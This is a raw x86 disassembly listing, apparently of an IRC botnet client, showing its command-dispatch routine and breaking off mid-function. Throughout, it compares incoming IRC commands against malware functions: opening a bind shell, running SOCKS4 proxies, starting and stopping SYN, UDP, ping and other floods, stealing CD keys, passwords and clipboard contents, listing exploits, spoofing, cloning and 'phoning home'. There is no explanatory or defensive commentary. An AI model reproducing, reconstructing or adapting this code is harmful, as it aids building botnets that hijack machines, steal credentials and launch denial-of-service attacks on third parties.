push offset dword_42D02C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_409855
loc_4025BE: ; CODE XREF: sub_401ACD+AD5�j
cmp [ebp+arg_28], ebx
jnz loc_409855
xor edi, edi
cmp dword_4294D4, ebx
jle loc_402773
mov [ebp+arg_20], offset dword_43D810
loc_4025DC: ; CODE XREF: sub_401ACD+B2E�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_402602
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_4294D4
jl short loc_4025DC
jmp loc_402773
; ---------------------------------------------------------------------------
loc_402602: ; CODE XREF: sub_401ACD+B1E�j
push offset asc_42D12C ; " :"
push [ebp+arg_0]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz loc_401E94
mov cl, byte_429094
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_429094
mov [eax+3], cl
lea ecx, dword_43D828[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_41B5F0
lea eax, [ebp+esi+var_50]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_402657: ; CODE XREF: sub_401ACD+C3B�j
push [ebp+arg_20]
lea eax, [ebp+var_A0]
push offset aD_1 ; "$%d-"
push eax
call sub_41B886
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41B900
add esp, 14h
test eax, eax
jz short loc_4026C3
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_4026C3
lea eax, dword_43D810[edi]
push eax
call sub_41AFE0
add [ebp+var_C], eax
pop ecx
jz short loc_4026FE
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4026FE
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_417EEF
add esp, 0Ch
jmp short loc_4026FE
; ---------------------------------------------------------------------------
loc_4026C3: ; CODE XREF: sub_401ACD+BB2�j
; sub_401ACD+BB9�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_4026FE
lea eax, [ebp+var_A0]
push 2
push eax
lea eax, [ebp+var_94]
push eax
call sub_41B5F0
lea eax, [ebp+var_94]
mov [ebp+var_92], bl
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_417EEF
add esp, 18h
loc_4026FE: ; CODE XREF: sub_401ACD+BCB�j
; sub_401ACD+BDF�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_402657
lea eax, [ebp+esi+var_50]
mov [ebp+arg_20], 10h
mov edi, eax
loc_40271B: ; CODE XREF: sub_401ACD+C9A�j
push [ebp+arg_20]
lea eax, [ebp+var_A0]
push offset aD_0 ; "$%d"
push eax
call sub_41B886
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41B900
add esp, 14h
test eax, eax
jz short loc_40275E
mov eax, [edi]
cmp eax, ebx
jz short loc_40275E
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_417EEF
add esp, 0Ch
loc_40275E: ; CODE XREF: sub_401ACD+C76�j
; sub_401ACD+C7C�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_40271B
mov [ebp+var_2C8], 1
loc_402773: ; CODE XREF: sub_401ACD+B02�j
; sub_401ACD+B30�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, byte_429094
jz short loc_40278C
cmp [ebp+var_2C8], ebx
jz loc_40297D
loc_40278C: ; CODE XREF: sub_401ACD+CB1�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_417EEF
lea eax, [ebp+var_C4]
push eax
push offset aUser_0 ; "$user"
push edi
call sub_417EEF
push [ebp+var_88]
push offset aChan ; "$chan"
push edi
call sub_417EEF
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40B08E
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_417EEF
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_417EEF
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_41B900
add esp, 14h
loc_4027FE: ; CODE XREF: sub_401ACD+E29�j
test eax, eax
jz loc_4028FB
push edi
push [ebp+arg_0]
call sub_41B900
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41B5F0
lea eax, [ebp+var_A0]
push offset asc_42CE14 ; ")"
push eax
call sub_41C0F4
add esp, 1Ch
cmp [ebp+var_A0], 30h
jl short loc_40284A
cmp [ebp+var_A0], 39h
jle short loc_402860
loc_40284A: ; CODE XREF: sub_401ACD+D72�j
push 3
lea eax, [ebp+var_A0]
push offset a63 ; "63"
push eax
call sub_41B5F0
add esp, 0Ch
loc_402860: ; CODE XREF: sub_401ACD+D7B�j
lea eax, [ebp+var_A0]
push eax
call sub_41B779
test eax, eax
pop ecx
jle short loc_402886
lea eax, [ebp+var_A0]
push eax
call sub_41B779
pop ecx
mov [ebp+var_94], al
jmp short loc_40289A
; ---------------------------------------------------------------------------
loc_402886: ; CODE XREF: sub_401ACD+DA2�j
call sub_41B8E2
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_94], dl
loc_40289A: ; CODE XREF: sub_401ACD+DB7�j
lea eax, [ebp+var_A0]
mov [ebp+var_93], bl
push eax
call sub_41AFE0
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_41B590
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_10]
push eax
call sub_41B5F0
lea eax, [ebp+var_94]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_417EEF
push edi
push [ebp+arg_0]
call sub_41B900
add esp, 30h
jmp loc_4027FE
; ---------------------------------------------------------------------------
loc_4028FB: ; CODE XREF: sub_401ACD+D33�j
mov edi, 1FFh
lea eax, [ebp+var_4488]
push edi
push [ebp+arg_0]
push eax
call sub_41B5F0
lea eax, [ebp+var_4488]
push edi
push eax
lea eax, [ebp+var_4AF0]
push eax
call sub_41B5F0
lea eax, [ebp+var_4AF0]
push offset asc_42D128 ; " "
push eax
call sub_41C0F4
add esp, 20h
mov [ebp+var_90], eax
lea edi, [ebp+var_8C]
mov [ebp+arg_10], 1Fh
loc_40294B: ; CODE XREF: sub_401ACD+E93�j
push offset asc_42D128 ; " "
push ebx
call sub_41C0F4
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40294B
mov ecx, [ebp+esi+var_90]
lea eax, [ebp+esi+var_90]
cmp ecx, ebx
jz loc_401E94
add ecx, 3
mov [eax], ecx
loc_40297D: ; CODE XREF: sub_401ACD+CB9�j
mov edi, [ebp+esi+var_90]
push edi
push offset aRndnick ; "rndnick"
mov [ebp+arg_8], edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409803
push edi
push offset aRn ; "rn"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409803
push edi
push offset aDie ; "die"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4049FD
push edi
push offset aD ; "d"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4049FD
push edi
push offset aLogout ; "logout"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404955
push edi
push offset aLo ; "lo"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404955
push edi
push offset aVersion ; "version"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404946
push edi
push offset aVer ; "ver"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404946
push edi
push offset aDedication ; "dedication"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40493C
push edi
push offset aDed ; "ded"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40493C
push edi
push offset aSpeedtest ; "speedtest"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404923
push edi
push offset aSt ; "st"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404923
push edi
push offset aSecure ; "secure"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404825
push edi
push offset aSec ; "sec"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404825
push edi
push offset aUnsecure ; "unsecure"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404825
push edi
push offset aUnsec ; "unsec"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404825
push edi
push offset aBindshell ; "bindshell"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40471F
push edi
push offset aBd ; "bd"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40471F
push edi
push offset aBindshellstop ; "bindshellstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402B41
push [ebp+esi+var_8C]
push 6
push offset aServer_0 ; "Server"
push offset dword_42CD68
loc_402B25: ; CODE XREF: sub_401ACD+10C2�j
; sub_401ACD+10E8�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B385
add esp, 20h
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_402B41: ; CODE XREF: sub_401ACD+1043�j
push edi
push offset aSocks4 ; "socks4"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045FD
push edi
push offset aS4 ; "s4"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045FD
push edi
push offset aSocks4stop ; "socks4stop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402B91
push [ebp+esi+var_8C]
push 19h
push offset aServer_0 ; "Server"
push offset dword_42CD40
jmp short loc_402B25
; ---------------------------------------------------------------------------
loc_402B91: ; CODE XREF: sub_401ACD+10AD�j
push edi
push offset aRloginstop ; "rloginstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402BBA
push [ebp+esi+var_8C]
push 9
push offset aServer_0 ; "Server"
push offset dword_42CD24
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402BBA: ; CODE XREF: sub_401ACD+10D3�j
push edi
push offset aHttpstop ; "httpstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402BE3
push [ebp+esi+var_8C]
push 3
push offset aServer_0 ; "Server"
push offset dword_42CD08
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402BE3: ; CODE XREF: sub_401ACD+10FC�j
push edi
push offset aLogstop ; "logstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402C0C
push [ebp+esi+var_8C]
push 25h
push offset dword_42CCF4
push offset dword_42CCE8
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402C0C: ; CODE XREF: sub_401ACD+1125�j
push edi
push offset aRedirectstop ; "redirectstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402C35
push [ebp+esi+var_8C]
push 18h
push offset dword_42CCC8
push offset dword_42CCB8
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402C35: ; CODE XREF: sub_401ACD+114E�j
push edi
push offset dword_42CCAC
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402C5E
push [ebp+esi+var_8C]
push 0Dh
push offset dword_42CCA0
push offset dword_42CC94
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_401ACD+1177�j
push edi
push offset aSynstop ; "synstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402C87
push [ebp+esi+var_8C]
push 0Eh
push offset dword_42CC80
push offset dword_42CC74
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402C87: ; CODE XREF: sub_401ACD+11A0�j
push edi
push offset aSkysynstop ; "skysynstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402CB0
push [ebp+esi+var_8C]
push 10h
push offset dword_42CC58
push offset dword_42CC48
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402CB0: ; CODE XREF: sub_401ACD+11C9�j
push edi
push offset aTarga3stop ; "targa3stop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402CD9
push [ebp+esi+var_8C]
push 11h
push offset dword_42CC2C
push offset dword_42CC1C
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402CD9: ; CODE XREF: sub_401ACD+11F2�j
push edi
push offset aWonkstop ; "wonkstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402D02
push [ebp+esi+var_8C]
push 12h
push offset dword_42CC04
push offset dword_42CBF8
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402D02: ; CODE XREF: sub_401ACD+121B�j
push edi
push offset aPacketstop ; "packetstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_402E58
mov esi, [ebp+esi+var_8C]
mov edi, [ebp+arg_4]
push esi
push 0Dh
push offset dword_42CCA0
push offset dword_42CC94
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
push esi
push 0Eh
push offset dword_42CC80
push offset dword_42CC74
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
add esp, 40h
push esi
push 17h
push offset dword_42CBE0
push offset dword_42CBD4
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
push esi
push 16h
push offset dword_42CBC8
push offset dword_42CBBC
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
add esp, 40h
push esi
push 11h
push offset dword_42CC2C
push offset dword_42CC1C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
push esi
push 12h
push offset dword_42CC04
push offset dword_42CBF8
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
add esp, 40h
push esi
push 0Fh
push offset dword_42CBAC
push offset dword_42CB9C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
push esi
push 13h
push offset dword_42CB8C
push offset dword_42CB7C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
add esp, 40h
push esi
push 10h
push offset dword_42CC58
push offset dword_42CC48
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B385
push ebx
push [ebp+var_4]
push offset unk_42CB48
push [ebp+var_88]
push edi
call sub_409A73
add esp, 34h
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_402E58: ; CODE XREF: sub_401ACD+1244�j
push edi
push offset aTsunamistop ; "tsunamistop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402E81
push [ebp+esi+var_8C]
push 0Fh
push offset dword_42CBAC
push offset dword_42CB9C
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402E81: ; CODE XREF: sub_401ACD+139A�j
push edi
push offset aWisdomstop ; "wisdomstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402EAA
push [ebp+esi+var_8C]
push 13h
push offset dword_42CB8C
push offset dword_42CB7C
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402EAA: ; CODE XREF: sub_401ACD+13C3�j
push edi
push offset aUdpstop ; "udpstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402ED3
push [ebp+esi+var_8C]
push 17h
push offset dword_42CBE0
push offset dword_42CBD4
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402ED3: ; CODE XREF: sub_401ACD+13EC�j
push edi
push offset aPingstop ; "pingstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402EFC
push [ebp+esi+var_8C]
push 16h
push offset dword_42CBC8
push offset dword_42CBBC
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402EFC: ; CODE XREF: sub_401ACD+1415�j
push edi
push offset aTftpstop ; "tftpstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402F25
push [ebp+esi+var_8C]
push 5
push offset aServer_0 ; "Server"
push offset dword_42CB00
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402F25: ; CODE XREF: sub_401ACD+143E�j
push edi
push offset aFindfilestop ; "findfilestop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045E5
push edi
push offset aFfstop ; "ffstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045E5
push edi
push offset aProcsstop ; "procsstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045CD
push edi
push offset aPsstop ; "psstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045CD
push edi
push offset aClonestop ; "clonestop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402FA2
push [ebp+esi+var_8C]
push 1Fh
push offset aClone ; "Clone"
push offset dword_42CAB0
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402FA2: ; CODE XREF: sub_401ACD+14BB�j
push edi
push offset aSecurestop ; "securestop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402FCB
push [ebp+esi+var_8C]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_42CA8C
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402FCB: ; CODE XREF: sub_401ACD+14E4�j
push edi
push offset aScanstop ; "scanstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_402FF4
push [ebp+esi+var_8C]
push 0Bh
push offset aScan_0 ; "Scan"
push offset dword_42CA6C
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_402FF4: ; CODE XREF: sub_401ACD+150D�j
push edi
push offset aScanstats ; "scanstats"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045B7
push edi
push offset aStats ; "stats"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045B7
push edi
push offset aTransferstats ; "transferstats"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045A1
push edi
push offset aTrstats ; "trstats"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4045A1
push edi
push offset aConnectbacksta ; "connectbackstats"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40458B
push edi
push offset aCbstats ; "cbstats"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40458B
push edi
push offset aExploitlist ; "exploitlist"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404575
push edi
push offset aExplist ; "explist"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404575
push edi
push offset aReconnect ; "reconnect"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404556
push edi
push offset aR ; "r"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404556
push edi
push offset aDisconnect ; "disconnect"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404534
push edi
push offset aDc ; "dc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404534
push edi
push offset aQuit_0 ; "quit"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4044EC
push edi
push offset aQ ; "q"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4044EC
push edi
push offset aStatus ; "status"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4044D8
push edi
push offset aS_1 ; "s"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4044D8
push edi
push offset aId ; "id"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4044A1
push edi
push offset aI ; "i"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4044A1
push edi
push offset aReboot ; "reboot"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4031C0
call sub_418338
test eax, eax
mov eax, offset unk_42C9A8
jnz short loc_403192
mov eax, offset unk_42C980
loc_403192: ; CODE XREF: sub_401ACD+16BE�j
push eax
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 1Ch
jmp loc_4083BD
; ---------------------------------------------------------------------------
loc_4031C0: ; CODE XREF: sub_401ACD+16B0�j
push edi
push offset aThreads ; "threads"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4043C2
push edi
push offset aT ; "t"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4043C2
push edi
push offset aAliases ; "aliases"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40439F
push edi
push offset aAl ; "al"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40439F
push edi
push offset aLog ; "log"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4042AC
push edi
push offset aLg ; "lg"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4042AC
push edi
push offset aClearlog ; "clearlog"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404293
push edi
push offset aClg ; "clg"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404293
push edi
push offset aNetinfo ; "netinfo"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404259
push edi
push offset aNi ; "ni"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_404259
push edi
push offset aSysinfo ; "sysinfo"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40422E
push edi
push offset aSi ; "si"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40422E
push edi
push offset aLsp100 ; "lsp100"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4041F4
push edi
push offset aLsp100 ; "lsp100"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4041F4
push edi
push offset aProcs ; "procs"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4040D1
push edi
push offset aPs ; "ps"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4040D1
push edi
push offset aGetcdkeys ; "getcdkeys"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4040B3
push edi
push offset aKey ; "key"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4040B3
push edi
push offset aUptime ; "uptime"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40402B
push edi
push offset aUp ; "up"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40402B
push edi
push offset aDriveinfo ; "driveinfo"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40400E
push edi
push offset aDrv ; "drv"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_40400E
push edi
push offset aTestdlls ; "testdlls"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403FF5
push edi
push offset aDll ; "dll"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403FF5
push edi
push offset aOpencmd ; "opencmd"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403FB6
push edi
push offset aOcmd ; "ocmd"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403FB6
push edi
push offset aCmdstop ; "cmdstop"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40340B
push [ebp+esi+var_8C]
push 0Ah
push offset dword_42C8C0
push offset dword_42C8B4
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_40340B: ; CODE XREF: sub_401ACD+1924�j
push edi
push offset dword_42C8B0
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_403528
cmp [ebp+var_8], ebx
jnz short loc_40343F
push ebx
push [ebp+var_4]
push offset dword_42C89C
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_40343F: ; CODE XREF: sub_401ACD+1956�j
mov eax, [ebp+arg_18]
mov [ebp+arg_20], ebx
mov [ebp+arg_18], eax
jmp short loc_40344D
; ---------------------------------------------------------------------------
loc_40344A: ; CODE XREF: sub_401ACD+19CC�j
mov eax, [ebp+arg_18]
loc_40344D: ; CODE XREF: sub_401ACD+197B�j
cmp [eax], bl
jz short loc_403454
inc eax
jmp short loc_403459
; ---------------------------------------------------------------------------
loc_403454: ; CODE XREF: sub_401ACD+1982�j
mov eax, offset aEmpty ; "<Empty>"
loc_403459: ; CODE XREF: sub_401ACD+1985�j
push eax
lea eax, [ebp+var_2C4]
push [ebp+arg_20]
push offset aD_S ; "%d. %s"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add [ebp+arg_18], 80h
add esp, 24h
inc [ebp+arg_20]
cmp [ebp+arg_20], 3
jl short loc_40344A
push offset unk_42C868
call sub_4151AD
pop ecx
loc_4034A6: ; CODE XREF: sub_401ACD+1C5B�j
; sub_401ACD+2F44�j
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_401E94
push edi
push offset aSpoof ; "spoof"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_404AF5
mov esi, [ebp+arg_10]
push offset aOff ; "off"
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_404A23
lea eax, [ebp+var_2C4]
push offset unk_42C834
push eax
mov ds:dword_4CEE08, ebx
call sub_41B886
pop ecx
pop ecx
loc_4034FE: ; CODE XREF: sub_401ACD+3023�j
cmp [ebp+var_8], ebx
jnz loc_409855
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
loc_403520: ; CODE XREF: sub_401ACD+7119�j
add esp, 14h
jmp loc_409855
; ---------------------------------------------------------------------------
loc_403528: ; CODE XREF: sub_401ACD+194D�j
push edi
push offset aGetclip ; "getclip"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403F75
push edi
push offset aGc ; "gc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403F75
push edi
push offset aFlusharp ; "flusharp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403F5E
push edi
push offset aFarp ; "farp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403F5E
push edi
push offset aFlushdns ; "flushdns"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403F26
push edi
push offset aFdns ; "fdns"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403F26
push edi
push offset aCurrentip ; "currentip"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403EEC
push edi
push offset aCip ; "cip"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403EEC
push edi
push offset aRloginserver ; "rloginserver"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403DB1
push edi
push offset aRlogin ; "rlogin"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403DB1
push edi
push offset aHttpserver ; "httpserver"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403C25
push edi
push offset aHttp ; "http"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403C25
push edi
push offset aTftpserver ; "tftpserver"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403AEB
push edi
push offset aTftp ; "tftp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_403AEB
push edi
push offset aCrash ; "crash"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4036B4
lea eax, [ebp+var_2C4]
push offset dword_42C78C
push eax
call sub_41B886
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_403693
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_403693: ; CODE XREF: sub_401ACD+1BA8�j
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
mov [esp+10h+var_10], offset aCrash ; "crash"
push [ebp+esi+var_7C]
call sub_41C070
jmp loc_40207C
; ---------------------------------------------------------------------------
loc_4036B4: ; CODE XREF: sub_401ACD+1B90�j
push edi
push offset aAsc ; "asc"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4037E7
push edi
push offset aSa ; "sa"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4037E7
push edi
push offset aPhonehome ; "phonehome"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_403708
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: hi ;).\r\n"
push [ebp+arg_4]
call sub_409A2D
jmp loc_401F52
; ---------------------------------------------------------------------------
loc_403708: ; CODE XREF: sub_401ACD+1C20�j
push edi
push offset aFindpass ; "findpass"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_40372E
push edi
push offset aFp ; "fp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4034A6
loc_40372E: ; CODE XREF: sub_401ACD+1C4A�j
push [ebp+var_88]
lea eax, [ebp+var_F54]
push 80h
push eax
call sub_41B980
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_F58], eax
mov eax, [ebp+var_4]
mov [ebp+var_ED0], eax
mov eax, [ebp+var_8]
mov [ebp+var_ECC], eax
push offset unk_42C720
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41B980
push ebx
lea eax, [ebp+var_2C4]
push 26h
push eax
call sub_40B0F7
add esp, 18h
mov [ebp+var_ED4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_F58]
push ebx
push eax
push offset sub_416F1B
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_ED4]
